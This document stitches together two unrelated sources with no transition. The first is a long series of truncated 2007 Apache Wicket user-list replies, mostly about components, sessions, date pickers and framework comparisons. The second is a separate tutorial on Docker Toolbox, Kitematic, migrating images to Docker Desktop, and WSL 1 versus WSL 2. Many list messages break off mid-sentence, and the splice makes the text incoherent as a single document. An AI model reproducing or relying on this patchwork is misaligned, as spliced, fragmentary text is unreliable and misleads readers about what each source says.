With regard to the Login/Welcome example, I have a problem with the Login's page's mutator methods being called in the onClick() in the Welcome page. Your scenario requires that Welcome know too much about Login. If Welcome and Login depend on the same model, and Welcome changes the model,
Re: Behaviour adding to Component body
On 7/30/07, Jan Kriesten [EMAIL PROTECTED] wrote: Hi Eelco, You can use onRendered and write directly to the response using Response response = component.getResponse(); not really. I tried that before, But that only writes the param after the close tag which isn't what is intended. :-)
Re: Behaviour adding to Component body
On 7/30/07, Martijn Dashorst [EMAIL PROTECTED] wrote: Yep, I was wondering why not create your own ShockWaveComponent that exposes the parameters using some API, and renders them using a repeating view? Yeah, you could do that as well. Though directly writing them out in onComponentTagBody
Re: Behaviour adding to Component body
since I haven't overridden onComponentTagBody yet - what happens to child-Tags then, do I have to manage these, too? If that's an issue, it's better to follow Martijn's advice and make this component a panel with a list view for the parameters. Eelco
Re: Behaviour adding to Component body
I thought I could just concentrate on the last aspect and apply only the needed changes... (i.e. move an attribute to a param name...). You should be able to pull that off if you use AbstractTransformerBehavior. Btw, if you ever get to it, a nice Flash component with a demo for
Re: Behaviour adding to Component body
yes, tried that already. strangely, object gets an additional xmlns:wicket=?! but it doesn't seem to hurt. Yeah, that happens in onComponentTag: public void onComponentTag(final Component component, final ComponentTag tag) {
Re: Menu???
Any extension or work being done to create a javascript based menu in Wicket? I know in the old nabble there was discussion but that was over a year ago. Nope. I guess it doesn't itch enough for us, and we didn't get any contributions in the mean time that I know off. If I'd had some more
Re: Resizing Table Columns Like Yahoo Mail
Or an advanced one That's sweet! Eelco - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: NullPointerException when clicking on an expired wizard button
I was running some random tests to try to see what kind of trouble a typical user of my app could cause. After completing a wizard, clicking the browser's back button, then clicking the previous button of the wizard, I get the error below. Is there a more graceful way to handle this rather
Re: mountBookmarkablePage and missing parameters - exception thrown
On 8/5/07, Igor Vaynberg [EMAIL PROTECTED] wrote: mount with indexed url coding strategy if you dont mind users messing with your urls. I think it's kind of annoying as well. Are we (Wicket devs) really against supporting this, or don't we support it because the code gets a bit hairy? Eelco
Re: How to use form method=get?
I've tried extending Form and adding tag.put(method, get) in onComponentTag(..), but this doesn't work either. The page gets rendered as with form method=get but submits won't work. Is this possible achieve? It looks like you can override method 'getMethod' in your form and let it return get.
Re: NullPointerException when clicking on an expired wizard button
On 8/6/07, David Leangen [EMAIL PROTECTED] wrote: After completing a wizard, clicking the browser's back button, then clicking the previous button of the wizard, I get the error below. Looks like a bug. Are you using 1.2.6? Yes. Unfortunately, I'm still stuck on 1.2.6+ for the
Re: {wicket 1.3 Beta 2} Adding panel via ajax...
On 8/7/07, Nino Saturnino Martinez Vazquez Wael [EMAIL PROTECTED] wrote: Ok, I'll try to explain myself a little better. Im using the tabs from extensions, tabs require that what you work with are panels (otherwise I would have done this with pages). So some of my tabs have a certain flow.
Re: BBcode component?
On 8/7/07, Nino Saturnino Martinez Vazquez Wael [EMAIL PROTECTED] wrote: Hi I was wondering if any one had done a bbcode component for wicket that they would share? Not that I know of. But I would be surprised if no-one every did this before with Wicket :) Im needing something that will do
Re: [Newbie] Add a yui calendar without a datetextfield
On 8/8/07, Igor Vaynberg [EMAIL PROTECTED] wrote: i used to use the code below, but now i see eelco has removed AbstractCalendar :( Sorry. I put it back. The problem is that it isn't maintained well, as all the effort so far has been around the date picker. And since the datepicker is a
Re: [Newbie] Add a yui calendar without a datetextfield
On 8/8/07, Gerolf Seitz [EMAIL PROTECTED] wrote: i was looking for AbstractCalendar too... hm, maybe we could use this as an opportunity to provide an all around YUI Calendar integration with features like a standalone calendar, multiple calendars, calendars that open when a specific event
Re: wicketstuff-dojo questions and answers
I'm getting the feeling this list doesn't have a ton of patience for questions it considers dumb. I think it's more a matter of us being incredibly busy :) Eelco - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional
Re: wicketstuff-dojo questions and answers
Q. a. Why isn't this stuff documented in more depth? b. And why don't people answer every stupid little question I have. A. a. Wicketstuff-Dojo is still a fairly young project with people who are currently more into coding it for more functionality than documenting. You're certainly welcome
Re: [Newbie] Add a yui calendar without a datetextfield
On 8/8/07, Igor Vaynberg [EMAIL PROTECTED] wrote: can you not factor out the common thing into an abstract behavior and have abstractcalendar add that abstract behavior to itself and bridge config methods through itself? Possibly. Core of the matter is that we should get rid of the code
Re: Compare JSP Vs Wicket?
Please send me all your suggestions, including the below question. In JSP, I can pass the values using a query string, e.g. form action=actionJSP.jsp?userName=edi&password=edi. Using request.getParameter(userName); I can get the userName. Using request.getParameter(password); I can get the
Re: Reacting to DateField change
On 8/9/07, Federico Fanton [EMAIL PROTECTED] wrote: On Thu, 9 Aug 2007 16:00:24 +0100 Dipu Seminlal [EMAIL PROTECTED] wrote: i just tried with the date picker on 1.2.6 and it works, don't know if anything has changed drastically in 1.3 In 1.3 DatePicker was replaced with DateField, they
Re: Reacting to DateField change
Ok, thanks anyway :) So.. Markup modification isn't needed, but if I'm not mistaken attaching the behavior directly to the DateField doesn't yield what I'm looking for..? Nope. That is because the DateField itself is a panel, while you need to attach it to the text field it embeds. In your
Re: Authentication in Webapp and Wicket documentation...
honestly spoken, this is not the best strategy for everyone... Obviously. But we have limited resources (no-one is paid for working on Wicket), so it is hard to cater to everyone. We have tried to attract writers (for a reference guide) from the very early start (even offered some money) but it
Re: Authentication in Webapp and Wicket documentation...
No, actually I was not aware of that, was waiting for the Wicket in Action book... You can get the first chapters now. Two more chapters will be released early next week. maybe one should also start writing some proper articles as a starting point; I might do
Re: shopping cart and back button
I have a user case like this: 1. User opens products page. 2. User chooses a product. 3. User clicks add product to shopping cart. 4. User is redirected to shopping cart list. 5. User clicks _back button in the browser_. 6. Added product in step 3 disappear from the shopping cart :( So is
Re: RequestDispather.forward()
Would the fact that wicket now uses a filter instead of a servlet have an effect on trying to forward a request. I'm trying to forward a request from the jsp/servlet portion of our app to a bookmarkable wicket page using RequestDispatcher.forward(), but no matter what sort of path I send it,
warning: API break FormComponent#checkRequired and FormComponentPanel
All, Please read and check whether this affects you. I didn't have time to look at the wicket-stuff projects, but if you are extending FormComponentPanel, you'll have to implement checkRequired
Re: Empty CSS
IResourceSettings.setDisableGZipCompression() is not available in the version of Wicket that I'm using (1.2.6). We didn't provide compression of resources in Wicket, so it's correct that setting doesn't exist. Eelco - To
nuke the sourceforge lists!
Hey Martijn, others, Can we go ahead and remove all users from the sourceforge lists and make sure no-one can every subscribe again? Or is there a better way? Eelco - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional
Re: Import Validation using wicket
I saw that example, But I am not able to understand fully. Pls explain. When you do: new TextField(foo, model, Integer.class); then Wicket will check that input can safely be converted to an integer. With the current version of Wicket, you don't even need to provide the Integer argument if
Re: Ideas for a Wicket Based Cms
two extra points: *) think about bookmarkability/ nice URLs. *) try to make the user-facing side (so the result of what people did with the CMS/ anything that can be accessed without logging in) stateless if you can. Eelco On 8/14/07, Eelco Hillenius [EMAIL PROTECTED] wrote: 1) It will use
Re: setSerializeSessionAttributes in wicket-1.3.0-beta2
On 8/14/07, Alex Objelean [EMAIL PROTECTED] wrote: In wicket-1.2.6 I used this in order to not serialize session attributes: [CODE] getDebugSettings().setSerializeSessionAttributes(false); [/CODE] What is equivalent for this in wicket-1.3.0-beta2? Thank you! There is none, but if you
Re: setSerializeSessionAttributes in wicket-1.3.0-beta2
On 8/14/07, Eelco Hillenius [EMAIL PROTECTED] wrote: On 8/14/07, Alex Objelean [EMAIL PROTECTED] wrote: In wicket-1.2.6 I used this in order to not serialize session attributes: [CODE] getDebugSettings().setSerializeSessionAttributes(false); [/CODE] What is equivalent
Re: Client Timezone in ClientProperties
I see that there is a method called getTimezone() on the ClientProperties object. The javadoc for it says Get the client's time zone if that could be detected. I tried to get this property, by submitting request from various browsers on various platforms, but it always returns null. Can
Re: Caching the context path
Is this a bug? If so, where should I look to fix this? Wicket 1.2 was greedy in determining and using the path. I think what you want should work with Wicket 1.3. Didn't test it yet though. Eelco
Re: setSerializeSessionAttributes in wicket-1.3.0-beta2
Eelco, the ISessionStore interface has a lot of methods.. can you give me an example of how to get rid of the serialization? It really slows down the application. I can imagine those checks did cost something in 1.2, though with Wicket 1.3 and the way we use it with the session stores should
Re: Wickest way to format a label before render
On 8/15/07, Francisco Diaz Trepat - gmail [EMAIL PROTECTED] wrote: done. but How about using your book? Come on... Are you intentionally building momentum? kind of like Hollywood blockbusters? :-) Are you enjoying our geeky intrigue? That's not right mister... /stephen_colbert jaja
Re: Wicket vs. ZK
I searched the threads on this forum but didn't find any discussion on comparing Wicket with ZK (), the #1 Ajax project on sourceforge.net now. I read a lot on both frameworks and they both seem nice from the feedback of the users. Since I am about to choose one web framework, I
Re: setSerializeSessionAttributes in wicket-1.3.0-beta2
Eelco, you're right! The latest profiling shows where the bottleneck is... it is indeed not where I was looking. I thought it was because of serialization, because when using the 1.2.x branch I found out that setSerializeSessionAttributes(false) improved application responsiveness a lot.
Re: Wicket vs. ZK
We've been using wicket for a couple of months now, our first application is about to be deployed, so I looked back at the templates and started wondering how much this separation of concerns applies to us. We have a base page with some panels supplied by subclasses, then those panels are
Re: setSerializeSessionAttributes in wicket-1.3.0-beta2
Well, in this case the bottleneck was caused by an expensive call which was not cashed inside a very long list... Anyway, profiling tools helps very much in such cases, so I would recommend everybody who have performance issues to use it. :) Yeah, for sure. Which tool are you using? We are
Re: 1:1-translation from html [was: Wicket vs. ZK]
in fact, select, choices (and radio) are still a weak part in wicket (imho). there are many classes to deal with them, but most aren't customizable enough and/or require different markup (span instead of select) as the designer would put in. It's certainly not a perfect framework, and we need
Re: Namespace change for Wickets xhtml tags in 1.3?
I guess we should. You mind opening a feature request for that? Eelco On 8/14/07, Erik van Oosten [EMAIL PROTECTED] wrote: Hi, Since the namespace for Wicket tags is now; I was wondering whether this will change in 1.3. I only found one incomplete thread
Re: Slider Component
I am relatively new to Wicket and just hooked to it. Thanks for creating such a good framework without any messy xml or configuration files. I just wanted to know if there are any good open source Slider component available and can be integrated with Wicket? I have found ZK, Prototype GI
Re: Editable DataTeble
Thanks gumnaam! Without the tree I would be exactly what I need. I gonna try it. Try adding columns to your datatable with EditableLabel components. Eelco - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands,
Re: Editable DataTeble
On 8/19/07, fero [EMAIL PROTECTED] wrote: I got it working:) The only thing to consider still is that if you make them all text fields, your browsers may have problems displaying them if they are too many. A whole bunch of text fields may also clutter the display quite a bit. If you use
Re: Editable DataTeble
On 8/19/07, fero [EMAIL PROTECTED] wrote: I see, but I don't know how to do editable labels. I could not find it among wicket/wicket-extensions classes. Plz tell me how to do them. See org.apache.wicket.extensions.ajax.markup.html.AjaxEditableLabel. You could use it like: item.add(new
Re: London Wicket - Bean Editor talk available on-line.
On 8/19/07, Martijn Dashorst [EMAIL PROTECTED] wrote: Keynote '08 just works Under file you can record your audio. If that is done, you can export it to swf, mov with audio. Neat. I'll have to try that sometime :) Eelco -
Re: Problem following TextField example
Hi !! I'm following TextField example at (sorry long line) After failing for a while I've found these differences in the generated html code: In the
Re: Problem following TextField example
you should worry about them. Duh. You should *not* worry about them :) Eelco - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: Problem following TextField example
Yes, as I said in my last post, I'm using 1.2.6, last stable version as of some two or three days ago. Thanks for your example !! That's why those two URLs are so different. What is not clear to me is what exactly goes wrong? Do you get exceptions? Or do your models not get upated
Re: SOLVED !! Re: Problem following TextField example
Browsing the forum archive I've found a clue to this issue: In web.xml I've changed the line url-pattern/wicket/url-pattern, adding a url-pattern//url-pattern as another url pattern and now it doesn't give an error. Can you give us your whole url-pattern section please? Note that it
Re: SOLVED !! Re: Problem following TextField example
servlet-mapping servlet-nameWicketApplication/servlet-name url-pattern/wicket/url-pattern /servlet-mapping servlet-mapping servlet-nameWicketApplication/servlet-name url-pattern//url-pattern /servlet-mapping I'm using Netbeans 5.5.1
Re: How to set wicket's locale?
On 8/21/07, Johan Compagner [EMAIL PROTECTED] wrote: then you browser tells wicket that it should use English . But you can set it yourself: Session.setLocale() Or if for instance you want to fix the locale to always use a certain one, use a custom session and set the locale it's constructor.
Re: wicket vs tapestry ?
On 8/22/07, Alex Shneyderman [EMAIL PROTECTED] wrote: I just started to look for a component based framework. I came across both tapestry and wicket (and it would be hard not to as you guys share the same host) but I kind of fail to see what the differences are? From my limited experiments
Re: wicket vs tapestry ?
Eelco Hillenius wrote: You can download the first chapter of Wicket In Action for free here: and some chapters of Tapestry In Action Wow, Wicket In Action, we're all were waiting for it :-) Is this early access edition mature enough to buy or it's better
Re: keyboard shortcuts in wicket ?
On 8/21/07, Nino Saturnino Martinez Vazquez Wael [EMAIL PROTECTED] wrote: Hi I once started a wicket stuff contrib, called wicket input events. Which were gonna be all about input events like mouse events and key events. It never got that far because I didnt really needed it. Nothing beats
Re: wicket vs tapestry ?
On 8/22/07, Chris Colman [EMAIL PROTECTED] wrote: Hi Eelco, I saw you mention Hibernate in the intro but I've been using JPOX with great success with Wicket also. You might want to mention that in the book or new comers might think Wicket is a Hibernate only framework. I use JPOX through
Re: wicket vs tapestry ?
On 8/22/07, Martijn Dashorst [EMAIL PROTECTED] wrote: You mean the wicket-phonebook? Yeah. Eelco - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: Page and compoenent level feedback are mixing together
On 8/22/07, Igor Vaynberg [EMAIL PROTECTED] wrote: you have to create your own custom feedback filter. this is simply how wicket feedback works. it is stored per page, and if you want to filter it you have to do it inside the panel. Still, using these filters is a bit clumsy imo. I can see
Re: wicket vs tapestry ?
But since I'm currently learning, I can't help wondering at each step where the data gets stored magically. Likely that will go away once I know my way around Wicket. It's also not a complaint, just part of getting to know the best way of doing things. I think it's a very good idea you have
Re: Page and compoenent level feedback are mixing together
what we need to do is collect usecases from our users. Agreed. Users please give your say! what you propose sounds great if you are doing component-hierarchy based filtering - but is this common. I think this is a natural way of thinking about it yeah. And I think it is better than not
Re: wicket vs tapestry ?
If you're interested, a contribution for the address book example with exPOJO/ JPOX would be more than welcome. Definitely, not a problem. When do you need it by? Whenever you feel like it. Where can I find the spec for the address book app? No spec, only code :)
Re: wicket vs tapestry ? (Back Button Detection-Support)
On 8/23/07, William Hoover [EMAIL PROTECTED] wrote: Possible starting point for a client solution for back button detection/support: Thanks for suggesting. We have discussed that and other
Re: Constructor of Component not DRY?
hmmm... that would go against my taste of chaining from the constructor with the least parameters to the constructor with the most parameters. I'd just tend to chose the constructor with the most complex signature as the default constructor, doing the 'real' construction part of the object
Re: [Wicket-user] Wicket in Action now available through Manning Early Access Program
On 8/24/07, Swaroop Belur [EMAIL PROTECTED] wrote: Well, i had the same bad luck as India is not in the choice. They asked me to get a paypal account Great. Largest software country in the world by now? So does it work with paypal then? For all countries? Eelco
Re: Component Factory and code against interface
On 8/24/07, Johan Compagner [EMAIL PROTECTED] wrote: We can do that because all our components implement specific interfaces which changes the state of the component. For example interface ILabelMethods { setBackground(Color color) setForeground(Color color) // and so on }
Re: DataView and onComponentTag
On 8/24/07, Igor Vaynberg [EMAIL PROTECTED] wrote: dataview doesnt have its own markup, it delegates it to its direct children. so you want to put that oncomponenttag into the item the dataview creates. override dataview.newitem() and override oncomponenttag on the returned item. It would
Re: DataView and onComponentTag
On 8/24/07, Igor Vaynberg [EMAIL PROTECTED] wrote: or we can forward the call to the repeatermore intuitive for newbies less intuitive for the rest :) The items would forward the calls? Hmmm. Sounds a bit dangerous/ confusing. Eelco
Re: Alternative to Wicket data binding
On 8/25/07, Matej Knopp [EMAIL PROTECTED] wrote: But the binding is as pluggable as possible. You can write any IModel implementation you want. Think of (Compound)PropertyModel as pure convenience implementation (that works for 99% usecases). With wicket, you don't think of mapping http
Re: Alternative to Wicket data binding
On 8/25/07, Igor Vaynberg [EMAIL PROTECTED] wrote: i think that is a foolish argument as you are assuming property model should only work on _beans_ it is perfectly normal to do something like this: class data { public String name; public int age; } Yes, I hope you didn't really think that I
Re: Alternative to Wicket data binding
On 8/25/07, Igor Vaynberg [EMAIL PROTECTED] wrote: On 8/25/07, Eelco Hillenius [EMAIL PROTECTED] wrote: On 8/25/07, Igor Vaynberg [EMAIL PROTECTED] wrote: i think that is a foolish argument as you are assuming property model should only work on _beans_ it is perfectly normal to do
Re: Alternative to Wicket data binding
I fail the see the logic in that, sorry. Why just not throw any scope limiting away? in this particular case: yes. dont forget that property model is entirely about convinience in the first place, and flattening scopes is just another part of that convenience :) So you write a class with
Re: Alternative to Wicket data binding
yes it is the second time this topic comes up out of how many of thousands of users there are i dont know. i think this feature is very convenient. it is not something you can toggle on and off because 3rd party components might be written with this in mind. so i would say keep it, end
Re: AJAX form submit and validation
On 8/26/07, Ian Godman [EMAIL PROTECTED] wrote: Thanks but this does not solve my problem. I am submitting the form via ajax using an AjaxSubmitLink. If the form has errors on it then I do not get the submit, if the form has no errors then the submit code runs ok. The errors are not
Re: Newbie questions
On 8/26/07, Otan [EMAIL PROTECTED] wrote: I hope that chapter on Models be free to download as well for the benefits of newbies. Sorry, I'm afraid we can't do that. Only chapter 1 is free to download. Eelco - To unsubscribe,
Re: DownloadLink hanging
On 8/27/07, Thomas Singer [EMAIL PROTECTED] wrote: Isn't fixing bugs the task of the Wicket developers? We don't have a problem ordering support, but I could not find information where to get it. It's unfortunate you have an urgent problem. Sorry about that. However, everyone of the development
Re: DownloadLink hanging
On 8/27/07, Thomas Singer [EMAIL PROTECTED] wrote: Your best bet on getting quick support is to fix it yourself and send in a patch. Well, if that would be possible, I would have done that or worked around it myself (like done with some own components).
Re: What's the minimum dependence of Wicket 1.3 beta2?
Read the maven documentation and understand the pom. That's definitely something I don't want to do. It has become harder in a not so small number of cases to build things from source since there are different and incompatible versions of maven - even more so since some maven repos don't
Re: Listview / input components repaint via ajax?
I have a listview in a panel. I have a ajax link to add items to the list. When I click the link the listview are repainted, because I have it in the markupcontainer just as it should. In the listview there are some textfields, these are cleared when the markupcontainer are repainted, I dont
Re: DatePicker
On 8/27/07, fero [EMAIL PROTECTED] wrote: Which components work with DatePicker except the TextField? I would like to use Label. Is it possible? We're talking about the one in wicket-datetime, right? Not entirely sure, but I think it should. Could you please just try? Make sure your label
Re: What's the minimum dependence of Wicket 1.3 beta2?
i just wanted to express, that not anyone trying to build a webapp with wicket is a maven expert or wants to become one (i don't want either). Agreed. so, when someone asks a question on dependencies, i find it somewhat 'rude' to just come in with a comment suggesting 'maven can tell it,
Re: unable to set content type
Wouldn't you use text/xml for that? Eelco On 8/15/07, Ryan Sonnek [EMAIL PROTECTED] wrote: I'm having some baffling behavior with my app. I have a custom web page that streams page xml content. I thought this would be pretty straightforward. should be able to just do this right?
Re: How to replace panelA with panelB using AjaxLink in panelA
On 8/13/07, Tauren Mills [EMAIL PROTECTED] wrote: My use case can best be described as making wicket-phonebook work within a single tab of a tabbed panel using AjaxLink for create, edit, and delete. Thus, I have a page that contains a TabbedPanel. One tab of TabbedPanel contains
Re: TreeTable question
On 8/14/07, Doug Leeper [EMAIL PROTECTED] wrote: I am using the Tree Table component in Wicket Extensions. I would like to do the following: Background: I have N number of columns: Column 1: operation panel (operations available for the particular tree node item) Column 2: the tree node
Re: Redirected after BrowserInfoPage and mounted Pages.
This was a bug. See WICKET-896. Thanks for reporting, it is fixed now. Eelco On 8/20/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Short description :- When using mounted pages, wicket redirects to wrong URL, after BrowserInfoPage, which is called by Session.get().getClientInfo(), when
Re: NullPointerException when resolving a class
I am trying to upgrade to wicket 1.3. I was running 1.2.6 with no problems. When trying to resolve the class for this markup: bundleresource://88/com/company/package/MyClass$WelcomeLabel.html in MarkupResourceStream, the method: public Class getMarkupClass() { return
Re: conditional markup change with AjaxEditableLabel
On 8/24/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Hi, i am using a subclass of AjaxEditableLabel. This one works fine so far but I have one Problem. If the value of the label is 0 the markup should change. I tried it this way with no effect. public class MyAjaxEditableLabel extends
Re: Using ClientProperties Object for User selectable Timezone.
On 8/21/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Currently ClientProperties object has a getTimeZone() method, that uses BrowserInfoPage's response, to calculate a client's Timezone. Would it be too much trouble to add a setTimeZone() method, so that the TimeZone property is user
Re: WicketSessionFilter
On 8/25/07, Nick Ward [EMAIL PROTECTED] wrote: I want to have a separate servlet to go along with my wicket application that can serve streaming files. However, it needs to have access to the wicket session to know what to stream. I was thinking about using a WicketSessionFilter to help me do
Re: wicket contrib yui
On 8/27/07, James McLaughlin [EMAIL PROTECTED] wrote: Yes there is. I haven't had much time to see what the impact of the change would be, but I set up YuiHeaderContributor to be able to select versions. If you have the time and inclination, you can setup the 2.3.0 library under
Re: hierarchy does not match
On 8/28/07, Kees de Kooter [EMAIL PROTECTED] wrote: Hi Igor, What kind of information would you like to have? Source code? I did attach the entire exception page. The Apache mailing lists don't allow attachments, so that got filtered. Furthermore, a relevant piece of code usually helps us
Re: Is Wicket a proper framework for a Webshop ?
If you're looking for a good action oriented framework - check out Stripes - I hear it's very good at what it does. The other alternative is Struts 2, but I hear people prefer Stripes. Spring MVC seems to be getting a little behind... imho any action oriented/ model 2 framework doesn't help
Re: Is Wicket a proper framework for a Webshop ?
For the record I completely agree with you :) I'm in the process of slapping the developers around here, trying to get them to wake up. Senior dev's recommending struts 1 for gods sake... now that's what i call afraid of change It's out of ignorance, and their unwillingness to see what
Re: Is Wicket a proper framework for a Webshop ?
On 8/29/07, William Hoover [EMAIL PROTECTED] wrote: Could you elaborate on what is lacking in Wicket when referring to the back button support (when compared to GWT)? I was under the impression that Wicket had robust back button support? Wicket's back button support is pretty robust for
Re: Is Wicket a proper framework for a Webshop ?
On 8/29/07, Gerolf Seitz [EMAIL PROTECTED] wrote: google wicket-bench -igor i know wicket-bench, have used it for wicket 1.2 actually. oh, and i like mark occurences too ;) And to make it complete, there is supposedly nice support for Netbeans as well:
Re: Wicket getting some bad press at Slashdot.org
On 8/29/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Over in the Slashdot article about GWT in Action there are some negative opinions toward Wicket expressed. Just thought I'd mention it in case any of the gurus want to weigh in too. (Head over to this link, set the threshold to 4, then
Re: best practice for a header component with links defined by the page
So let me try to rephrase your problem: you have a header component that shows a variable number of components (links). Use a repeater (e.g. list view or repeating view) for the variable number of components, and you probably want to wrap the header component in a panel so that it is easy to move
Re: Wicket capability for LARGE forms
On 8/29/07, Antony Stubbs [EMAIL PROTECTED] wrote: I have a couple of pages with _very large forms_, that are also modified dynamically to set which fields are editable using javascript, dependant on the value of a drop down list. Please see the example image attached. And that's only the
Docker is a Platform as a Service (PaaS) product, using which developers can build, ship and run their applications inside Docker containers. Now used everywhere, it is the new way of application deployment. The Docker Toolbox, Docker Desktop and the Windows Subsystem for Linux (WSL) are all designed to expand its reach and make life easier for developers.
Docker has revolutionised the DevOps pipeline. A Docker image, as most of us know, is a static representation of the application, as well as its configuration and dependencies. These images are stored in a remote public registry, called Docker Hub. Thus, to run an application stored as an image, we must pull the image and run it in a container. For those who do not have any background knowledge about Docker, a container is a live instantiation of an image. As Docker has become a huge success, one might want to learn about this technology without having a separate Linux installation. This is where Docker for Windows comes in. It not only allows you to run Docker service on Windows but also provides a nice GUI for those who are not very comfortable with the command line interface (CLI). Let us see what Docker for Windows can offer to its users.
Docker Toolbox
If your Windows build is older than 16299 and does not satisfy the requirements of the new Docker Desktop, then Docker Toolbox can help you. Docker Toolbox is not managed by Docker but is available for use on GitHub. It provides you with a Docker Quickstart Terminal, Kitematic, and Oracle VirtualBox. Docker Quickstart Terminal is a preconfigured Docker CLI, while Kitematic provides a GUI for Docker. Docker engine commands like docker-machine and docker-compose are also included.
The questions that arise are: how is Docker Toolbox enabling us to use Docker on Windows? What is the technology underlying it? As stated earlier, Docker Toolbox includes Oracle VirtualBox as well. What could be the purpose of a virtual machine in using Docker on Windows? Let’s answer these questions.
The Docker Engine daemon depends on Linux-specific kernel features, namely namespaces and cgroups. Thus, running Docker natively on Windows is not possible. So, the Windows system hosts the Docker Engine on a compact Linux virtual machine, which Docker Toolbox creates and attaches using the docker-machine command. This machine is deliberately minimal, so it may not support many commands beyond what Docker needs. Let us look at the installation process and how the toolbox can be used.
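Under the hood, you can inspect this virtual machine with the docker-machine command from the Docker Quickstart Terminal. As a hedged example (the machine created by Docker Toolbox is conventionally named 'default'):

$docker-machine ls
$docker-machine ip default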
Installing Docker Toolbox
Before installing Docker Toolbox, ensure that your system has 64-bit Windows 7 or higher, and virtualisation is enabled.
The installation steps are as follows:
- Docker Toolbox is no longer maintained by Docker, so download the .exe installer from its GitHub releases page.
- Double click the installer for installing Docker Toolbox.
- If your system already has VirtualBox installed, uncheck it. Also, if VirtualBox is running, stop it before installing Docker Toolbox.
- Accept all other default settings and install Docker Toolbox. Once it has been successfully installed, it can be verified by the three new icons on your desktop, namely, Docker Quickstart Terminal, Oracle VirtualBox, and Kitematic (Alpha).
Docker Quickstart Terminal
To start using Docker on Windows, click on Docker Quickstart Terminal. This launches the pre-configured Docker Toolbox terminal, which sets up everything on its own. Choose ‘Yes’ each time it prompts for permission. This terminal runs the bash shell instead of the Windows command prompt, as Docker needs it for running.
Once the setup is completed, a Docker shell will show up, and you can verify the installation by executing the command docker --version.
This terminal supports all Docker commands like pulling an image from the Docker Hub and running a container from the pulled image. We can also commit and push an image to Docker Hub.
Let us create a container using Docker Quickstart Terminal with a Jenkins image running in it. The command for this is docker run -p 8080:8080 -p 50000:50000 jenkins/jenkins:lts. Figure 1 shows the above Docker command in execution.
Now, let us see how we can publish an image to the Docker Hub Registry. For this, run the following commands:
$docker commit <container_name> <docker_hub_repository>/<new_image_name>:<image_tag> $docker login $docker push <image-name>:<tag>
Note that these commands can be used to publish the image to any Docker Registry.
Figure 2 shows how an image can be published to the Docker Hub Registry.
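For instance, with hypothetical names (substitute your own container name, Docker Hub repository and tag):

$docker commit jenkins_container myuser/my-jenkins:v1
$docker login
$docker push myuser/my-jenkins:v1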
Let us explore this terminal by trying some other commands. Figures 3 and 4 show some basic Linux commands that do not run on Docker Quickstart Terminal and those that run on the terminal, respectively.
Kitematic (Alpha)
This is for software engineers who are not at ease with the CLI and Docker commands. Kitematic offers a GUI for working with Docker images and containers. Most of the basic functions can be executed with it. For using it, you must create a virtual machine when asked, and login with your Docker Hub ID.
In the left panel of Kitematic GUI, you will find the list of all stopped and running containers. The main panel lists all the recommended images from Docker Hub and the images in your own repository too. We can search for images and create new containers by clicking on Create. We can also specify port numbers, version, and tag of the image that we wish to pull.
On selecting a particular container in the left panel, a new view shows up. As we have run a Jenkins image on port number 8080, we can see the container logs in the main panel and Web Preview on the top right panel. Volumes are shown in the lower right panel. Output of container logs is shown in Figure 5.
We can also view and update container properties from the Settings panel. Settings shows all the container properties like container name, environment variables, exposed ports, networks, etc. We can always go to this panel and change the settings as required. Thus, with the Kitematic GUI, it has become easier to create and manage containers. Figure 6 shows the Settings of the Jenkins container.
Image migration
Migration of Docker images from Docker Toolbox to Docker Desktop can be easily done by saving the image as a tar file by following these steps:
1. Create a separate directory for Docker images and give it all the permissions as in the commands given below:
$mkdir ~/docker-images $cd ~/docker-images $chmod 777 ./
2. Use the docker save command for creating a tar file:
$docker save <image_id> -o ./<image_name>.tar
3. The tar file can be found in the docker-images directory.
This tar file will be loaded on to the Docker Desktop using the docker load command, details of which will be covered later in the article.
If Docker Toolbox is great, why Docker Desktop?
Docker Toolbox has certain issues that Docker Desktop solves. A virtual machine is no longer a good option for running Docker, as newer and better technology such as the Windows Subsystem for Linux is available, and Docker Desktop uses it. Also, not all operations are possible with Kitematic: the option of pushing images is missing, and many tabs do not work as expected. Based on our experience, we recommend Docker Desktop rather than Docker Toolbox. If your system cannot support Docker Desktop, then Docker Toolbox is a good option for using Docker on Windows. The uninstallation procedure for Docker Toolbox is documented in its GitHub repository.
What is WSL?
Consider the task of running Linux distros on Windows machines. The obvious solution that comes to mind is running it in a virtual machine. Software like Oracle VirtualBox and VMware Workstation can help us with that. The software allocates some fixed computing resources to the virtual machine. Using a virtual machine puts heavy load on the host machine. This is because virtual machines use a static allocation of resources. Hence, when it is running, a chunk of the host machine’s resources get blocked, which deteriorates its performance. Also software like Oracle VirtualBox and VMware Workstation are type-2 hypervisors, which means they access the host machine hardware indirectly through the host OS. This slows down the virtual machine too. Life would be much simpler if we could directly run our Linux distros without the involvement of such software.
If there were ways using which we could use basic Linux tools and applications directly on Windows, all our worries would have gone away. Windows Subsystem for Linux (WSL) does exactly this. WSL allows us to run distros available on Microsoft Store on Windows machines. It allows processes running in Windows and Linux to communicate with one another. A client-server application stored on a Windows file system may have its GUI (client-side) running on Windows and its server-side running on Linux. Thus, WSL makes it possible to develop applications that can run on both Windows and Linux simultaneously.
WSL uses a hyper-optimised lightweight virtual machine, which is different from traditional virtual machines. It boots up in very little time and is completely managed by Windows itself. Thus, external software (like VirtualBox) is not needed.
WSL 1 vs WSL 2
WSL 2, released after WSL 1, is an improvement over the latter. The file system performance is much better in the second version. Also, it supports all the system calls supported by the Linux kernel. A detailed comparison between WSL 1 and WSL 2 is shown in Figure 7. WSL 2 enables virtualisation through the native virtualisation technology of Windows OS and Hyper-V. It does create a virtual machine behind the scenes, but the creation is done by WSL 2 in a highly optimised manner. It ensures less resource utilisation by allocating resources dynamically as and when required by the virtual machine. Also, Windows automatically switches off inactive virtual machines. This contributes to reducing the time to start the virtual machine.
